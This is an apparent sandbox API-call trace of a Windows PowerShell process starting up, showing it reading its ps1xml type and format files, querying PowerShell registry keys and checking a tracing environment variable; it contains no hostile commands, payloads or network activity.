	[0512.381] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0512.382] GetFileType (hFile=0x324) returned 0x1
	[0512.382] SetErrorMode (uMode=0x1) returned 0x1
	[0512.382] GetFileType (hFile=0x324) returned 0x1
	[0512.382] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.383] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.383] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.383] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.383] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.384] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.384] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.384] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.384] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0512.385] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.063] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.064] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.064] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.064] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.065] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.065] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.065] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.067] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.067] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.067] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.068] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.068] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.068] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.068] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.069] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.069] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.069] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.070] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.070] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.070] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.070] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.071] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.071] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.073] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.073] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.074] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.074] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.074] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.074] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.075] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.075] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0513.075] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0513.075] ReadFile (in: hFile=0x324, lpBuffer=0x2cd2118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2cd2118*, lpNumberOfBytesRead=0x12d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0513.076] CloseHandle (hObject=0x324) returned 1
	[0513.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0513.076] SetErrorMode (uMode=0x1) returned 0x1
	[0513.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d120 | out: lpFileInformation=0x12d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0513.076] SetErrorMode (uMode=0x1) returned 0x1
	[0513.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0513.077] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x324) returned 0x0
	[0513.077] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d18c, lpData=0x0, lpcbData=0x12d188*=0x0 | out: lpType=0x12d18c*=0x1, lpData=0x0, lpcbData=0x12d188*=0x56) returned 0x0
	[0513.077] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0e90
	[0513.077] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d15c, lpData=0x1b7c0e90, lpcbData=0x12d158*=0x56 | out: lpType=0x12d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d158*=0x56) returned 0x0
	[0513.077] CoTaskMemFree (pv=0x1b7c0e90) 
	[0513.077] RegCloseKey (hKey=0x324) returned 0x0
	[0513.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0513.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0515.678] VirtualQuery (in: lpAddress=0x12bef0, lpBuffer=0x12cdb0, dwLength=0x30 | out: lpBuffer=0x12cdb0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0519.312] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0519.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.312] CoTaskMemFree (pv=0x3ba680) 
	[0519.328] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d3a8 | out: phkResult=0x12d3a8*=0x324) returned 0x0
	[0519.328] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d3bc, lpData=0x0, lpcbData=0x12d3b8*=0x0 | out: lpType=0x12d3bc*=0x1, lpData=0x0, lpcbData=0x12d3b8*=0x74) returned 0x0
	[0519.328] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d32c, lpData=0x0, lpcbData=0x12d328*=0x0 | out: lpType=0x12d32c*=0x1, lpData=0x0, lpcbData=0x12d328*=0x74) returned 0x0
	[0519.328] CoTaskMemAlloc (cb=0x78) returned 0x3559d0
	[0519.328] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d2fc, lpData=0x3559d0, lpcbData=0x12d2f8*=0x74 | out: lpType=0x12d2fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d2f8*=0x74) returned 0x0
	[0519.328] CoTaskMemFree (pv=0x3559d0) 
	[0519.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0519.328] SetErrorMode (uMode=0x1) returned 0x1
	[0519.328] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0519.329] SetErrorMode (uMode=0x1) returned 0x1
	[0519.329] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0519.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.329] CoTaskMemFree (pv=0x3ba680) 
	[0519.336] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0519.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.336] CoTaskMemFree (pv=0x3ba680) 
	[0519.336] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0519.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.336] CoTaskMemFree (pv=0x3ba680) 
	[0519.337] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0519.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.337] CoTaskMemFree (pv=0x3ba680) 
	[0519.337] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0519.337] GetFileType (hFile=0x2f8) returned 0x1
	[0519.337] SetErrorMode (uMode=0x1) returned 0x1
	[0519.337] GetFileType (hFile=0x2f8) returned 0x1
	[0519.337] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0519.339] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0519.339] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0519.339] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0519.340] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0519.340] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0519.340] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x9e2, lpOverlapped=0x0) returned 1
	[0519.340] ReadFile (in: hFile=0x2f8, lpBuffer=0x337968a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337968a*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0519.341] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x337a140*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0519.341] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x2f8) returned 0x0
	[0519.341] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0519.341] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0f70
	[0519.341] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x1b7c0f70, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0519.341] CoTaskMemFree (pv=0x1b7c0f70) 
	[0519.341] RegCloseKey (hKey=0x2f8) returned 0x0
	[0519.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0519.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0519.347] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x86a99dbb, Data2=0x75be, Data3=0x409f, Data4=([0]=0xb1, [1]=0x81, [2]=0xa9, [3]=0x4, [4]=0xa6, [5]=0xee, [6]=0xb5, [7]=0xb4))) returned 0x0
	[0519.357] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x9541ddc2, Data2=0x9ff8, Data3=0x451d, Data4=([0]=0xa8, [1]=0x83, [2]=0x4e, [3]=0xb9, [4]=0xd5, [5]=0xa0, [6]=0xfe, [7]=0xe0))) returned 0x0
	[0520.623] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0520.623] GetFileType (hFile=0x2f8) returned 0x1
	[0520.623] SetErrorMode (uMode=0x1) returned 0x1
	[0520.623] GetFileType (hFile=0x2f8) returned 0x1
	[0520.623] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a4ca8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.624] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a4ca8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.625] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a4ca8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.625] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a4ca8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.626] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a4ca8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0520.627] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a4ca8*, lpNumberOfBytesRead=0x12cf18*=0xfb2, lpOverlapped=0x0) returned 1
	[0520.627] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a43c2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a43c2*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0520.627] ReadFile (in: hFile=0x2f8, lpBuffer=0x33a4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x33a4ca8*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0520.627] CloseHandle (hObject=0x2f8) returned 1
